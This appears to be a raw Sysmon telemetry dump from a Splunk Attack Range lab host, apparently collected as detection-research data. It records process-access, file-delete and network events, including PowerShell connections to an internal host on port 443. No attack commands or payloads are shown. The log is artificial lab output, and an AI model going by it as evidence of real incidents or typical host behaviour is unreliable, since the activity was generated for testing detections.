space 23542300x800000000000000035084182Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.880{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26B60CC8D71E2B1B5A7FC520032FA9B8,SHA256=35AB6D0AFF84E1EBEFAACB9B5DDC1FD63A1DA32BBF83453C037A71854A8246F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084181Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.334{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DD8-613A-3090-03000000C801}6404C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084180Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.334{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084179Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:28.334{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084178Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.334{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084177Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:28.334{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084176Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.334{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4DD8-613A-3090-03000000C801}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084175Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.334{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DD8-613A-3090-03000000C801}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084174Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.329{B81B27B7-4DD8-613A-3090-03000000C801}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.895{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55EC209DAAF1AFC63182A3CF9B5C0013,SHA256=3EB34A0978ECDEF4244E8C12EBC062F73C9E518E55944C68D96DD76E4B8F44B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035084194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:53.267{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56576-false10.0.1.12-8000- 23542300x800000000000000035084193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B52E349A8AE58FCE1710482144C04E30,SHA256=C435CF38FFB761E109B681F1DF9FC131CF19AC0CB68959D501884F3413BA8B69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C06DDBEE5A4D8FC1998F34FDE6C75220,SHA256=AF53D9D55F6D092FDF1734B40846FCE1E47CC772B97168F9F70E41AA01918093,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.180{B81B27B7-4DD9-613A-3190-03000000C801}19884052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.031{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DD9-613A-3190-03000000C801}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.029{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:29.029{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.029{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:29.029{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4DD9-613A-3190-03000000C801}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.029{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.028{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DD9-613A-3190-03000000C801}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
154100x800000000000000035084183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.012{B81B27B7-4DD9-613A-3190-03000000C801}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
23542300x800000000000000035084196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:30.928{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1245A9D3C63519F34F59827F2D43731A,SHA256=C37856B3B6899B2D8D9603FD48B930F8D0E3BB6BD3F095F5C2CF9827DF842622,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:31.946{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF717e50f7.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:31.946{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC9451F7D0D1A2926A90645F596869C3,SHA256=CDB7A14E3C39FDA505DB8BABC77E9D897F11A7B865EFA0735D4C390CA4B879CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:31.777{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F5E7786B0D360C92CBF1361D2C2C2563,SHA256=D2659E11BE98805DE0A4CF8437D59065004DA15842CB82C5A9D5B5BA41A234A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:32.976{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2C98EBCDA2870E0F1E6E5B013FAF9E0,SHA256=F8743C34EF0E777E82416D91A6E851FE7CA462B428501A6663C1580B7C81AAEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
354300x800000000000000035084200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:56.764{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56577-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https
354300x800000000000000035084203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.092{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56578-false10.0.1.12-8000-
23542300x800000000000000035084202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:34.006{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9C265CDBA324CA2631A443232A138D4,SHA256=CAE540C7226281B0B45A419F58191B7C5C85206C1D374ABD650F8262F1645F6F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:35.026{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=330C70C5108AFE92BD06F3426480258C,SHA256=6B007DAE2A917DFDDC46A39BE290BF36ABCB630230B20AC6A65EE43B259843D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:36.393{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=592283C54DF36EDDE75570D1770914BA,SHA256=D18E8C94B2C9648CED2EDD858E8EA7D8E503C4F085F3E978A5D504D565E1335C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084205Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:36.044{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC90539736E7A412B2BAE08D7745E71A,SHA256=64D1F40DBB63C9FDA7670A37285079FD63B29F6AFF7775E280446500738F320F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084208Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:37.925{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E6776F7BE6C385E0A3A34A8D69E92D3E,SHA256=DA896F45F5686D1522C4D901AD9ABF868BA224D57DBB4BE0FE3AC82FF8A8B46F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084207Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:37.045{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7CFA844CAEC4C8E98D4CAAA98B058F9,SHA256=E639627F55BEE7974E10CB43CCB9BFEFFC1D7866AA4F288C4A9A81CC91BC63F4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
354300x800000000000000035084212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:02.786{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56579-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https
23542300x800000000000000035084211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:38.391{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:38.391{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=0B43B43A3A3C18A001D0AE957A380828,SHA256=DA01823A612AC8ED65010DDD629986F9157113A31F94185858212BA3D9468D3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
